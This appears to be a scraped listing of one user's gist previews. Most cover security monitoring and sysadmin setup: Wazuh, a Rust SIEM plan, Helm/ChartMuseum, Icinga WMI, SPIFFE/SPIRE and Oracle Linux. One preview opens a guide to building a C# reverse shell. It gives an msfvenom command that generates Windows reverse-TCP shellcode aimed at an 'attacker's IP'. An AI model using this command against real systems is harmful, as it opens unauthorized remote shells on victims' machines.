anubhavg-icpl

osquery-wazuh.sh.x.c
osq

anubhavg-icpl

# GNU/Linux Resource List


#####   Shells


✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>

anubhavg-icpl

Wazuh Agent Logging Capabilities: Comprehensive Technical Analysis

Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.

Agent architecture and core logging framework

Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour

anubhavg-icpl

Cross-Platform Rust-Based SIEM Platform Implementation Plan

A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.

🎯 Executive Summary

This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.

Key Differentiators:

• Memory Safety: 68% reduction in security vulnerabilities compared to C/C++ implementations

anubhavg-icpl

Complete Guide: Setting Up and Publishing Helm Charts to ChartMuseum

1. Setting Up ChartMuseum

Install ChartMuseum in Kubernetes

# Add ChartMuseum's Helm repo
helm repo add chartmuseum https://chartmuseum.github.io/charts

# Install ChartMuseum with API enabled for uploads

anubhavg-icpl

🛠️ Step-by-Step Guide to Creating a C# Reverse Shell

1. Generate Shellcode with msfvenom

Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp

anubhavg-icpl

//
//  main.m
//  EndpointSecurityDemo
//
//  Created by Omar Ikram on 17/06/2019 - macOS Catalina 10.15 Beta 1 (19A471t)
//  Updated by Omar Ikram on 15/08/2019 - macOS Catalina 10.15 Beta 5 (19A526h)
//  Updated by Omar Ikram on 01/12/2019 - macOS Catalina 10.15 (19A583)
//  Updated by Omar Ikram on 31/01/2021 - macOS Big Sur 11.1 (20C69)
//  Updated by Omar Ikram on 07/05/2021 - macOS Big Sur 11.3.1 (20E241)
//  Updated by Omar Ikram on 04/07/2021 - macOS Monterey 12 Beta 2 (21A5268h)

anubhavg-icpl

https://community.icinga.com/t/monitoring-windows-remotely-through-wmi/2007

Below is an example document that explains how to set up and use remote Windows monitoring through WMI with Icinga. You can adjust paths, usernames, and parameters as needed for your environment.

---

Monitoring Windows Remotely via WMI with Icinga

This guide details how to monitor Windows machines without installing an agent by leveraging the Windows Management Instrumentation (WMI) layer. It focuses on using the check_wmi_plus plugin with Icinga, along with the WMIC client on Linux. Although other methods (e.g. PowerShell, SSH, SNMP) exist, this guide covers the WMI solution primarily for legacy environments (Windows Server 2012 and later).

anubhavg-icpl

Here’s a merged and bullet-point version that combines the steps for setting up SPIFFE and SPIRE with additional requirements like Cilium, private DNS, and mutual TLS (mTLS) without Kubernetes:

1. Set Up Cilium on Linux VMs for Service Mesh

• Install Cilium on each VM for managing service-to-service networking.
• Configure Cilium to run in standalone mode (without Kubernetes).
• Enable Cilium's service mesh features, including layer 7 (L7) policies, which will be integrated with SPIFFE identities later.

2. Install and Configure Private DNS

• Choose and install CoreDNS or dnsmasq on a central VM to handle internal DNS resolution for your cluster.
• Configure the private DNS server to resolve internal services with domain names like service1.internal.cluster.local.

anubhavg-icpl

Based on the documentation, I'll help guide you through installing Oracle Database Free on Oracle Linux 9. Here are the steps:

1. First, log in as the root user.

2. Install the Oracle Database Preinstallation RPM:

dnf -y install oracle-database-preinstall-23ai

3. Go to the Oracle Database Free software download page: